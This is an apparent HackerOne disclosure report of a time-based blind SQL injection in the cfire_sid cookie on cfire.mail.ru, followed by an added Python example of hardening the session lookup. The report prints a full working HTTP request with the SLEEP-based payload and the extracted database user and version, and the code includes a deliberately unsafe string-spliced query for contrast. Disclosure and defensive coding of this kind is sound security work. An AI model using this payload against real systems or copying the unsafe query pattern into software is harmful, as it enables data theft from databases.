ID H1:107780
Type hackerone
Reporter konqi
Modified 2016-01-15T10:06:47
Description
Good day.
The cookie named cfire_sid is vulnerable. Working PoC:
GET /account/userbar/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25
Host: cfire.mail.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
Referer: https://cfire.mail.ru/account/
Cookie: cfbb_lastvisit=1448331119; cfbb_lastactivity=0; cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b'; cfire_uid=14911677; sdcs=7H5SdDmbxCAVy4Be; pw_sms_pv=708a7; __utma=148931300.1974397146.1448326349.1450489314.1451690206.4; __utmb=148931300.26.10.1451690206; __utmc=148931300; __utmz=148931300.1450146333.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=site%3Acfire.mail.ru; partner_id=1_264_60149_0__; __atuvc=27%7C0; __atuvs=568708d9dcea1dd901a; p=/2IAAOfiTQAA; mrcu=775B5682C0962E7E43C49BD79D25; _ym_uid=1451409559153734271; i=AQAl8oRWAgATAAglDDwAAT4AAT8AAVQAAXIDAf8DAVQEAaQEAV4FAVkGAuwHAUgIAU4CCAQB7QEB; PHPSESSID=*********; iid=139613474; hasflash=false; flashless=false; _ym_isad=0; _ga=GA1.2.1435233556.1451417862; b=oEECAHB0YwQAI/Zko04GYOyEnYpgElUAhAkAAAj9iOZA9C/O1mBmUxYC; searchuid=976077651416940799; t_100451_67_0=1; t_0=1; _es=5a7278bb7415473c9cdc99a2a2a625f1.oJ0woigYlfky5-mVqm7dG2doZCs; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAACAAAMDzAcA; mr1lad=568708d960efc1ac-0-0-; Mpop=******; mc2=cfire.mail.ru; _ym_visorc_26627847=w; VID=1X9ciD0SjkXQ0000030614HQ::
Connection: Keep-Alive
Data can be extracted by character-by-character enumeration.
cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),1,1)='c',SLEEP(3),1)%2b' - true (sleeps 3 sec)
cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 if(substring(user(),2,1)='x',SLEEP(3),1)%2b'
Data obtained to demonstrate the vulnerability:
MySQL server version - 5.5.40
Username - cfire@172.16.17.54
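As an added illustration (not part of the report or of Mail.ru's code) of how the cfire_sid lookup can be hardened: the session id is checked against its expected 32-character hex format before use and is then bound as a query parameter, so the payload above never reaches the SQL parser as syntax. The sessions table, its columns and the sqlite3 backend are assumptions; the cookie headers are constructed from the values in the report.

```python
import re
import sqlite3

# Constructed Cookie header carrying the cfire_sid payload from the report
# (other cookies trimmed), and a clean header with the unmodified session id.
RAW_COOKIE = (
    "cfbb_lastvisit=1448331119; "
    "cfire_sid=42767ca19a891c1077f377f6e96120b2'%2%20and%20 "
    "if(substring(user(),1,1)='c',SLEEP(3),1)%2b'; cfire_uid=14911677"
)
CLEAN_COOKIE = "cfire_sid=42767ca19a891c1077f377f6e96120b2; cfire_uid=14911677"

# The legitimate cfire_sid is a 32-character lowercase hex token; anything else is rejected.
SID_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_cookie_header(header):
    """Split a raw Cookie header into a dict, keeping values as opaque strings."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def extract_sid(header):
    """Return cfire_sid only if it has the expected format, otherwise None."""
    sid = parse_cookie_header(header).get("cfire_sid", "")
    return sid if SID_RE.fullmatch(sid) else None


def unsafe_query_text(sid):
    """The vulnerable shape: the cookie value is spliced into SQL, so a quote ends the literal."""
    return f"SELECT uid FROM sessions WHERE sid = '{sid}'"


def make_db():
    """Hypothetical sessions table (assumed schema) with one valid session."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (sid TEXT PRIMARY KEY, uid INTEGER)")
    conn.execute("INSERT INTO sessions VALUES (?, ?)",
                 ("42767ca19a891c1077f377f6e96120b2", 14911677))
    return conn


def lookup_user(conn, sid):
    """Parameterised lookup: the session id is bound as data, never as SQL text."""
    row = conn.execute("SELECT uid FROM sessions WHERE sid = ?", (sid,)).fetchone()
    return row[0] if row else None


def authenticate(header):
    """Format check first, then a bound-parameter lookup; returns uid or None."""
    sid = extract_sid(header)
    return None if sid is None else lookup_user(make_db(), sid)
```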
Title Mail.ru: [cfire.mail.ru] Time Based SQL Injection
Published 2016-01-02T01:46:46
Href https://hackerone.com/reports/107780
Team mailru (https://hackerone.com/mailru)
Bounty 150.0 (resolved)
CVSS 0.0 (NONE)
Last seen 2018-11-23T14:56:20